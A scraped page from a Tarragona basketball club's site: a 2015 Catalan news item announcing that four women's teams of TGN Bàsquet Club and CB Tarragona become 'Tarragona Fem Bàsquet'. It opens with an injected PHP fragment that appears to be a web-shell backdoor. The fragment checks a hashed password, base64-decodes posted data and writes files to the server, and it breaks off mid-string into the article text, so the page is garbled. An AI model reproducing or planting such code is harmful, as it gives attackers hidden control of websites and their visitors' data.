function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tarragona Fem Bàsquet, el nou nom del projecte entre el TGN Bàsquet i el CBT - Tgn Bàsquet Club -

Tarragona Fem Bàsquet, el nou nom del projecte entre el TGN Bàsquet i el CBT

By
Updated: octubre 29, 2015

Tarragona Fem Bàsquet, el projecte conjunt del TGN Bàsquet Club i el CB Tarragona per potenciar l’esport de la cistella femení a Tarragona

Els quatre equips que formen part de l’acord per potenciar el bàsquet femení entre el TGN Bàsquet Club i el CB Tarragona passaran a anomenar-se, a partir d’aquesta setmana, Tarragona Fem Bàsquet. Així, els dos equips sèniors que actualment juguen al pavelló del Sagrat Cor, vesteixen la samarreta lila i militen en la Copa Catalunya Femenina i Primera Catalana Femenina (TGN Bàsquet A i TGN Bàsquet B), i els conjunts júnior preferent i cadet preferent que disputen els seus partits al pavelló del Serrallo i que porten la samarreta blava del CBT, tindran aquest nom comú que identificarà clarament el projecte.

Aquest canvi de nom no comporta el canvi de color a la samarreta (els quatre continuaran jugant de lila i blau respectivament) ni de seu, jugant cada equip com a local al mateix pavelló que fins ara –de fet, els dos equips sèniors del TGN Bàsquet Club entrenen un dia al Serrallo i el júnior i el cadet del CB Tarragona ho fan un dia al pavelló del Sagrat Cor-.

El canvi de nom es realitza per reforçar encara més la imatge d’unió pel bàsquet femení entre les dues entitats en un acord històric i sense precedents a la ciutat de Tarragona que es va certificar el mes de juliol passat. Aquest acord, que és per dues temporades –aquesta i la vinent-, tot i que amb voluntat de continuïtat, pretén que ambdós clubs treballin plegats en la línia del bàsquet femení i va suposar la cessió de la plaça de Copa Catalunya Femenina del CB Tarragona al TGN Bàsquet Club, que també va mantenir el seu equip a Primera Catalana Femenina. Els dos club han aportat jugadores per la confecció dels equips per augmentar el seu potencial. L’intercanvi d’informació entre els tècnics és constant i es treballa en comissions conjuntes per treure més rendiment al bàsquet femení de la ciutat.

Així doncs els equips s’anomenaran de la següent manera:

  • Tarragona Fem Bàsquet A (Copa Catalunya Femenina)
  • Tarragona Fem Bàsquet B (Primera Catalana Femenina)
  • Tarragona Fem Bàsquet Júnior (Júnior Preferent)
  • Tarragona Fem Bàsquet Cadet (Cadet Preferent)

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *